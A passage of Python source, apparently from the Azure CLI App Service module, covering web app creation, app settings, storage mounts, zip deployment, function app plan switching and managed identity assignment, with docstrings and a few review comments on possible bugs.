            if not match:
                raise CLIError("Linux Runtime '{}' is not supported."
                               " Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
        elif deployment_container_image_name:
            site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
            if name_validation.name_available:
                site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
                                                              value="false"))
        elif multicontainer_config_type and multicontainer_config_file:
            encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
            site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
    elif plan_info.is_xenon:  # windows container webapp
        site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
        # set the needed app settings for container image validation
        if name_validation.name_available:
            site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
                                                          value=docker_registry_server_user))
            site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
                                                          value=docker_registry_server_password))
            site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
                                                          value=docker_registry_server_url))
    elif runtime:  # windows webapp with runtime specified
        if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
            raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
                           "--multicontainer-config-type and --multicontainer-config-file is "
                           "only appliable on linux webapp")
        match = helper.resolve(runtime)
        if not match:
            raise CLIError("Runtime '{}' is not supported. Please invoke 'az webapp list-runtimes' to cross check".format(runtime))  # pylint: disable=line-too-long
        match['setter'](cmd=cmd, stack=match, site_config=site_config)
        # Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack
        if not match['displayName'].startswith('node'):
            if name_validation.name_available:
                site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
                                                              value=node_default_version))
    else:  # windows webapp without runtime specified
        if name_validation.name_available:
            site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
                                                          value=node_default_version))
    if site_config.app_settings:
        for setting in site_config.app_settings:
            logger.info('Will set appsetting %s', setting)
    if using_webapp_up:  # when the routine is invoked as a help method for webapp up
        if name_validation.name_available:
            logger.info("will set appsetting for enabling build")
            site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
    if language is not None and language.lower() == 'dotnetcore':
        if name_validation.name_available:
            site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
                                                          value='https://{}.scm.azurewebsites.net/detectors'
                                                          .format(name)))
    poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
    webapp = LongRunningOperation(cmd.cli_ctx)(poller)
    # Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
    _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
                             deployment_source_branch, deployment_local_git)
    _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
    if deployment_container_image_name:
        update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
                                  deployment_container_image_name, docker_registry_server_user,
                                  docker_registry_server_password=docker_registry_server_password)
    if assign_identities is not None:
        identity = assign_identity(cmd, resource_group_name, name, assign_identities,
                                   role, None, scope)
        webapp.identity = identity
    return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
                                          multicontainer_config_type=None, multicontainer_config_file=None):
    """Return True when exactly one container configuration style is chosen.

    The multicontainer type and file must be supplied as a pair; of the
    three mutually exclusive options (runtime, single container image,
    multicontainer config) exactly one may be present.
    """
    # The multicontainer type/file flags only make sense together.
    if bool(multicontainer_config_type) != bool(multicontainer_config_file):
        return False
    chosen = sum(1 for option in (runtime, deployment_container_image_name, multicontainer_config_type) if option)
    return chosen == 1
def parse_docker_image_name(deployment_container_image_name):
    """Extract the registry server portion of a container image name.

    Returns None for empty input and for bare Docker Hub images
    ('nginx', 'library/nginx'); a registry host is recognized by
    containing '.' or ':' before the last '/'
    (e.g. 'myregistry.azurecr.io/app' or 'localhost:5000/app').
    """
    if not deployment_container_image_name:
        return None
    registry, sep, _ = deployment_container_image_name.rpartition('/')
    if not sep:
        # No '/' at all: plain image name, no registry part.
        return None
    if '.' not in registry and ':' not in registry:
        # 'library/nginx'-style Hub path, not a registry host.
        return None
    return registry
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
    """Add or update app settings; *slot_settings* are also made slot-sticky.

    Each entry is either 'KEY=VALUE' or JSON as produced by the matching
    'list' command. Returns the merged settings rendered for CLI output.
    Raises CLIError when neither settings list is supplied.
    """
    if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings |--slot-settings')
    settings = settings or []
    slot_settings = slot_settings or []
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_application_settings', slot)
    result, slot_result = {}, {}
    # pylint: disable=too-many-nested-blocks
    for src, dest in [(settings, result), (slot_settings, slot_result)]:
        for s in src:
            try:
                temp = shell_safe_json_parse(s)
                if isinstance(temp, list):  # a bit messy, but we'd like accept the output of the "list" command
                    for t in temp:
                        if t.get('slotSetting', True):
                            slot_result[t['name']] = t['value']
                            # Mark each setting as the slot setting
                        else:
                            result[t['name']] = t['value']
                else:
                    dest.update(temp)
            except CLIError:
                # Not JSON: fall back to plain KEY=VALUE parsing.
                setting_name, value = s.split('=', 1)
                dest[setting_name] = value
    # Slot-sticky values win over plain ones on key collisions.
    result.update(slot_result)
    for setting_name, value in result.items():
        app_settings.properties[setting_name] = value
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_application_settings',
                                         app_settings.properties, slot, client)
    app_settings_slot_cfg_names = []
    if slot_result:
        # Register the new names in the app's slot-sticky configuration list.
        new_slot_setting_names = slot_result.keys()
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
        slot_cfg_names.app_setting_names += new_slot_setting_names
        app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
                              share_name, access_key, mount_path=None, slot=None, slot_setting=False):
    """Attach a new Azure storage mount (identified by *custom_id*) to the site.

    Raises CLIError when *custom_id* is already configured. With
    *slot_setting* the id is additionally registered as slot-sticky.
    Returns the updated storage-account configuration properties.
    """
    AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
    azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                     'list_azure_storage_accounts', slot)
    if custom_id in azure_storage_accounts.properties:
        raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
                       "Use 'az webapp config storage-account update' to update an existing "
                       "Azure storage account configuration.".format(custom_id))
    azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
                                                                         share_name=share_name, access_key=access_key,
                                                                         mount_path=mount_path)
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', azure_storage_accounts.properties,
                                         slot, client)
    if slot_setting:
        # Record the id in the slot-sticky configuration names (idempotent).
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
        if custom_id not in slot_cfg_names.azure_storage_config_names:
            slot_cfg_names.azure_storage_config_names.append(custom_id)
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
                                 share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
    """Update an existing Azure storage mount identified by *custom_id*.

    Only the supplied fields are changed; omitted fields keep their
    previous values. Raises CLIError when *custom_id* is not configured.
    Returns the updated storage-account configuration properties.
    """
    AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
    azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                     'list_azure_storage_accounts', slot)
    existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
    if not existing_account_config:
        raise CLIError("No Azure storage account configuration found with the id '{}'. "
                       "Use 'az webapp config storage-account add' to add a new "
                       "Azure storage account configuration.".format(custom_id))
    # Merge: every omitted argument falls back to the existing value.
    new_account_config = AzureStorageInfoValue(
        type=storage_type or existing_account_config.type,
        account_name=account_name or existing_account_config.account_name,
        share_name=share_name or existing_account_config.share_name,
        access_key=access_key or existing_account_config.access_key,
        mount_path=mount_path or existing_account_config.mount_path
    )
    azure_storage_accounts.properties[custom_id] = new_account_config
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', azure_storage_accounts.properties,
                                         slot, client)
    if slot_setting:
        # Record the id in the slot-sticky configuration names (idempotent).
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
        if custom_id not in slot_cfg_names.azure_storage_config_names:
            slot_cfg_names.azure_storage_config_names.append(custom_id)
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
    """Zip-deploy *src* to a function app, handling remote-build and the
    Linux consumption-plan special case.

    Raises CLIError when the app is missing or remote build is requested
    on a non-Linux app.
    """
    client = web_client_factory(cmd.cli_ctx)
    app = client.web_apps.get(resource_group_name, name)
    if app is None:
        raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
                       'Please make sure these values are correct.'.format(name, resource_group_name))
    parse_plan_id = parse_resource_id(app.server_farm_id)
    plan_info = None
    retry_delay = 10  # seconds
    # We need to retry getting the plan because sometimes if the plan is created as part of function app,
    # it can take a couple of tries before it gets the plan
    for _ in range(5):
        plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
                                                 parse_plan_id['name'])
        if plan_info is not None:
            break
        time.sleep(retry_delay)
    if build_remote and not app.reserved:
        raise CLIError('Remote build is only available on Linux function apps')
    is_consumption = is_plan_consumption(cmd, plan_info)
    # Linux consumption without remote build: run-from-package via a
    # storage blob instead of the Kudu zipdeploy endpoint.
    if (not build_remote) and is_consumption and app.reserved:
        return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
    if build_remote:
        add_remote_build_app_settings(cmd, resource_group_name, name, slot)
    else:
        remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
    return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
    """Zip-deploy the package at *src* to a web app (or one of its slots).

    Plain web apps need none of the function-app remote-build handling,
    so this simply delegates to enable_zip_deploy.
    """
    return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
    """POST the zip at *src* to the Kudu async zipdeploy endpoint, then
    poll the deployment status until completion or *timeout*.

    Raises CLIError when the SCM URL cannot be resolved or another
    deployment is already in progress (HTTP 409).
    """
    logger.warning("Getting scm site credentials for zip deployment")
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    try:
        scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    except ValueError:
        raise CLIError('Failed to fetch scm url for function app')
    zip_url = scm_url + '/api/zipdeploy?isAsync=true'
    deployment_status_url = scm_url + '/api/deployments/latest'
    import urllib3
    authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    headers = authorization
    headers['Content-Type'] = 'application/octet-stream'
    headers['Cache-Control'] = 'no-cache'
    headers['User-Agent'] = get_az_user_agent()
    import requests
    import os
    from azure.cli.core.util import should_disable_connection_verify
    # Read file content
    with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
        zip_content = fs.read()
        logger.warning("Starting zip deployment. This operation can take a while to complete ...")
        res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
        logger.warning("Deployment endpoint responded with status code %d", res.status_code)
    # check if there's an ongoing process
    if res.status_code == 409:
        raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
                       "Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
                       "is removed.".format(deployment_status_url))
    # check the status of async deployment
    response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
                                            authorization, timeout)
    return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
    """Prepare app settings for a remote (Kudu/Oryx) build and wait for the
    SCM site to observe them.

    Ensures SCM_DO_BUILD_DURING_DEPLOYMENT=true and removes the
    WEBSITE_RUN_FROM_PACKAGE / ENABLE_ORYX_BUILD settings, which conflict
    with remote builds.
    """
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    scm_do_build_during_deployment = None
    website_run_from_package = None
    enable_oryx_build = None

    app_settings_should_not_have = []
    app_settings_should_contain = {}

    # Snapshot the current values of the three relevant settings.
    for keyval in settings:
        value = keyval['value'].lower()
        if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
            scm_do_build_during_deployment = value in ('true', '1')
        if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
            website_run_from_package = value
        if keyval['name'] == 'ENABLE_ORYX_BUILD':
            enable_oryx_build = value

    if scm_do_build_during_deployment is not True:
        logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
        update_app_settings(cmd, resource_group_name, name, [
            "SCM_DO_BUILD_DURING_DEPLOYMENT=true"
        ], slot)
        app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'

    if website_run_from_package:
        logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
        delete_app_settings(cmd, resource_group_name, name, [
            "WEBSITE_RUN_FROM_PACKAGE"
        ], slot)
        app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')

    if enable_oryx_build:
        logger.warning("Removing ENABLE_ORYX_BUILD app setting")
        delete_app_settings(cmd, resource_group_name, name, [
            "ENABLE_ORYX_BUILD"
        ], slot)
        app_settings_should_not_have.append('ENABLE_ORYX_BUILD')

    # Wait for scm site to get the latest app settings
    if app_settings_should_not_have or app_settings_should_contain:
        logger.warning("Waiting SCM site to be updated with the latest app settings")
        scm_is_up_to_date = False
        retries = 10
        # Poll up to ~50s (10 tries x 5s sleep) for propagation.
        while not scm_is_up_to_date and retries >= 0:
            scm_is_up_to_date = validate_app_settings_in_scm(
                cmd, resource_group_name, name, slot,
                should_contain=app_settings_should_contain,
                should_not_have=app_settings_should_not_have)
            retries -= 1
            time.sleep(5)

        if retries < 0:
            logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
    """Force SCM_DO_BUILD_DURING_DEPLOYMENT=false (local build) and wait
    for the SCM site to observe the change."""
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    scm_do_build_during_deployment = None

    app_settings_should_contain = {}

    for keyval in settings:
        value = keyval['value'].lower()
        if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
            scm_do_build_during_deployment = value in ('true', '1')

    # Update only when the setting is absent or not already false.
    if scm_do_build_during_deployment is not False:
        logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
        update_app_settings(cmd, resource_group_name, name, [
            "SCM_DO_BUILD_DURING_DEPLOYMENT=false"
        ], slot)
        app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'

    # Wait for scm site to get the latest app settings
    if app_settings_should_contain:
        logger.warning("Waiting SCM site to be updated with the latest app settings")
        scm_is_up_to_date = False
        retries = 10
        # Poll up to ~50s (10 tries x 5s sleep) for propagation.
        while not scm_is_up_to_date and retries >= 0:
            scm_is_up_to_date = validate_app_settings_in_scm(
                cmd, resource_group_name, name, slot,
                should_contain=app_settings_should_contain)
            retries -= 1
            time.sleep(5)

        if retries < 0:
            logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
    """Deploy *src* by uploading it to the app's AzureWebJobsStorage account
    and pointing WEBSITE_RUN_FROM_PACKAGE at a long-lived SAS URL.

    Used for Linux consumption function apps where zipdeploy is not
    available. Raises CLIError when the storage connection string is
    missing; returns None.
    """
    settings = get_app_settings(cmd, resource_group_name, name, slot)

    storage_connection = None
    for keyval in settings:
        if keyval['name'] == 'AzureWebJobsStorage':
            storage_connection = str(keyval['value'])

    if storage_connection is None:
        raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')

    container_name = "function-releases"
    # Timestamp + UUID keeps every release blob unique.
    blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
    BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
    block_blob_service = BlockBlobService(connection_string=storage_connection)
    if not block_blob_service.exists(container_name):
        block_blob_service.create_container(container_name)

    # https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
    def progress_callback(current, total):
        # Render a 30-character upload progress bar.
        total_length = 30
        # NOTE(review): the grouping int(round(a)/float(b)) looks like it was
        # meant to be int(round(a / float(b))) — results are close either
        # way; confirm before changing.
        filled_length = int(round(total_length * current) / float(total))
        percents = round(100.0 * current / float(total), 1)
        progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
        progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
        cmd.cli_ctx.get_progress_controller().add(message=progress_message)

    block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
                                             progress_callback=progress_callback)

    # SAS window: starts 10 minutes in the past (clock-skew margin) and
    # lasts 520 weeks (~10 years).
    now = datetime.datetime.now()
    blob_start = now - datetime.timedelta(minutes=10)
    blob_end = now + datetime.timedelta(weeks=520)
    BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
    blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
                                                                          blob_name,
                                                                          permission=BlobPermissions(read=True),
                                                                          expiry=blob_end,
                                                                          start=blob_start)
    blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
    website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
    update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
    client = web_client_factory(cmd.cli_ctx)

    try:
        logger.info('\nSyncing Triggers...')
        if slot is not None:
            client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
        else:
            client.web_apps.sync_function_triggers(resource_group_name, name)
    except CloudError as ce:
        # This SDK function throws an error if Status Code is 200
        if ce.status_code != 200:
            raise ce
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
                                setting_properties, slot=None, client=None):
    # Dispatch a settings update to the matching SDK operation, appending
    # '_slot' to the operation name when a deployment slot is targeted.
    # NOTE(review): the builtin `str` is passed as a positional argument (the
    # SDK operation's `kind` parameter position) — looks suspicious; confirm
    # against the azure-mgmt-web operation signature before changing.
    client = client or web_client_factory(cli_ctx)
    operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
    if slot is None:
        return operation(resource_group_name, name, str, setting_properties)
    return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
    """Show the site object, with plan props renamed and the FTP publishing
    URL attached for display purposes."""
    webapp = app_instance
    if not webapp:  # invoked through the CLI rather than as an internal helper
        webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(name))
    _rename_server_farm_props(webapp)
    _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
    return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
    """Generic-update getter: fetch the raw site object for the app/slot."""
    site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    return site
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
               skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
    """Generic-update setter: push the modified site object back, forwarding
    the DNS-related passthrough flags."""
    instance = kwargs['parameters']
    client = web_client_factory(cmd.cli_ctx)
    call_kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
                       skip_dns_registration=skip_dns_registration,
                       skip_custom_domain_verification=skip_custom_domain_verification,
                       force_dns_registration=force_dns_registration,
                       ttl_in_seconds=ttl_in_seconds)
    if slot:
        call_kwargs['slot'] = slot
        return client.web_apps.create_or_update_slot(**call_kwargs)
    return client.web_apps.create_or_update(**call_kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
    """Apply simple 'true'/'false' toggles to a webapp instance.

    Rejects function apps — those must go through 'az functionapp update'.
    """
    if 'function' in instance.kind:
        raise CLIError("please use 'az functionapp update' to update this function app")
    for attr, flag in (('client_affinity_enabled', client_affinity_enabled),
                       ('https_only', https_only)):
        if flag is not None:
            setattr(instance, attr, flag == 'true')
    return instance
def update_functionapp(cmd, instance, plan=None):
    """Optionally move a function app onto a different App Service plan.

    The plan may be a full resource id or a plan name within the app's own
    resource group; plan-compatibility rules are enforced before switching.
    """
    client = web_client_factory(cmd.cli_ctx)
    if plan is None:
        return instance
    if is_valid_resource_id(plan):
        parsed = parse_resource_id(plan)
        dest_plan_info = client.app_service_plans.get(parsed['resource_group'], parsed['name'])
    else:
        dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
    if dest_plan_info is None:
        raise CLIError("The plan '{}' doesn't exist".format(plan))
    validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info)
    instance.server_farm_id = dest_plan_info.id
    return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance):
    """Raise CLIError unless both the current and target plans are either
    Consumption or Elastic Premium."""
    general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
    src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
    src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
                                                 src_parse_result['name'])
    if src_plan_info is None:
        raise CLIError('Could not determine the current plan of the functionapp')

    def _allowed(plan):
        # a plan qualifies when it is Consumption or Elastic Premium
        return is_plan_consumption(cmd, plan) or is_plan_elastic_premium(cmd, plan)

    if not _allowed(src_plan_info):
        raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg)
    if not _allowed(dest_plan_instance):
        raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
                       general_switch_msg)
def set_functionapp(cmd, resource_group_name, name, **kwargs):
    """Generic-update setter for function apps; rejects plain web apps."""
    instance = kwargs['parameters']
    if 'function' not in instance.kind:
        raise CLIError('Not a function app to update')
    web_client = web_client_factory(cmd.cli_ctx)
    return web_client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
    """List web apps (function apps are filtered out)."""
    apps = _list_app(cmd.cli_ctx, resource_group_name)
    return [app for app in apps if 'function' not in app.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
    """List deleted apps, ordered by their deleted-site id."""
    deleted = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
    deleted.sort(key=lambda site: site.deleted_site_id)
    return deleted
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
    """Restore a deleted app into an existing site; configuration is restored
    too unless restore_content_only is set."""
    DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
    restore_request = DeletedAppRestoreRequest(deleted_site_id=deleted_id,
                                               recover_configuration=not restore_content_only)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'restore_from_deleted_app', slot, restore_request)
def list_function_app(cmd, resource_group_name=None):
    """List function apps (plain web apps are filtered out)."""
    apps = _list_app(cmd.cli_ctx, resource_group_name)
    return [app for app in apps if 'function' in app.kind]
def _list_app(cli_ctx, resource_group_name=None):
    """Enumerate sites — subscription-wide or scoped to one resource group —
    with server-farm props renamed for display."""
    client = web_client_factory(cli_ctx)
    if resource_group_name:
        apps = list(client.web_apps.list_by_resource_group(resource_group_name))
    else:
        apps = list(client.web_apps.list())
    for app in apps:
        _rename_server_farm_props(app)
    return apps
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
    """Collect deleted apps across every deleted-apps location, then filter by
    the optional resource group / name / slot (name and slot compare
    case-insensitively)."""
    client = web_client_factory(cli_ctx)
    result = []
    for location in _get_deleted_apps_locations(cli_ctx):
        result.extend(client.deleted_web_apps.list_by_location(location))
    if resource_group_name:
        result = [r for r in result if r.resource_group == resource_group_name]
    if name:
        wanted_name = name.lower()
        result = [r for r in result if r.deleted_site_name.lower() == wanted_name]
    if slot:
        wanted_slot = slot.lower()
        result = [r for r in result if r.slot.lower() == wanted_slot]
    return result
def _build_identities_info(identities):
    """Summarize a requested-identity list into
    (info dict, type string, external ids, has-system-assigned)."""
    from ._appservice_utils import MSI_LOCAL_ID
    identities = identities or []
    external_identities = [x for x in identities if x != MSI_LOCAL_ID]
    # an empty request, or an explicit MSI_LOCAL_ID, means system-assigned
    include_system = not identities or MSI_LOCAL_ID in identities
    identity_types = []
    if include_system:
        identity_types.append('SystemAssigned')
    if external_identities:
        identity_types.append('UserAssigned')
    identity_types = ','.join(identity_types)
    info = {'type': identity_types}
    if external_identities:
        info['userAssignedIdentities'] = {e: {} for e in external_identities}
    return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
    """Enable managed identity on a web app.

    assign_identities may contain MSI_LOCAL_ID (system-assigned) and/or
    user-assigned identity resource ids; when omitted, system-assigned is
    enabled. role/scope optionally grant the identity an RBAC assignment via
    the shared assign_identity helper.
    """
    ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
                                                                  'ManagedServiceIdentityType')
    UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
    _, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)

    def getter():
        # current site state, re-fetched by the generic helper before setting
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)

    def setter(webapp):
        # Merge requested identity kinds with what is already on the app:
        # once both kinds are involved, the combined type must be used.
        if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif external_identities and enable_local_identity:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif external_identities:
            identity_types = ResourceIdentityType.user_assigned
        else:
            identity_types = ResourceIdentityType.system_assigned
        if webapp.identity:
            webapp.identity.type = identity_types
        else:
            webapp.identity = ManagedServiceIdentity(type=identity_types)
        if external_identities:
            # add (or keep) an entry per requested user-assigned identity
            if not webapp.identity.user_assigned_identities:
                webapp.identity.user_assigned_identities = {}
            for identity in external_identities:
                webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
        poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
        return LongRunningOperation(cmd.cli_ctx)(poller)

    from azure.cli.core.commands.arm import assign_identity as _assign_identity
    webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
    return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
    """Return the app's managed-identity block."""
    site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    return site.identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
    """Remove managed identities from a web app.

    remove_identities may contain MSI_LOCAL_ID (system-assigned) and/or
    user-assigned identity resource ids; when omitted, the system-assigned
    identity is removed.
    """
    IdentityType = cmd.get_models('ManagedServiceIdentityType')
    UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
    _, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)

    def getter():
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)

    def setter(webapp):
        # nothing to do when the app has no identity at all
        if webapp.identity is None:
            return webapp
        to_remove = []
        existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
        if external_identities:
            to_remove = {x.lower() for x in external_identities}
            # every id requested for removal must currently be assigned
            non_existing = to_remove.difference(existing_identities)
            if non_existing:
                raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
            # removing the last user-assigned identity downgrades the type
            if not list(existing_identities - to_remove):
                if webapp.identity.type == IdentityType.user_assigned:
                    webapp.identity.type = IdentityType.none
                elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
                    webapp.identity.type = IdentityType.system_assigned
        webapp.identity.user_assigned_identities = None
        if remove_local_identity:
            # drop the SystemAssigned part, keeping UserAssigned when present
            webapp.identity.type = (IdentityType.none
                                    if webapp.identity.type == IdentityType.system_assigned or
                                    webapp.identity.type == IdentityType.none
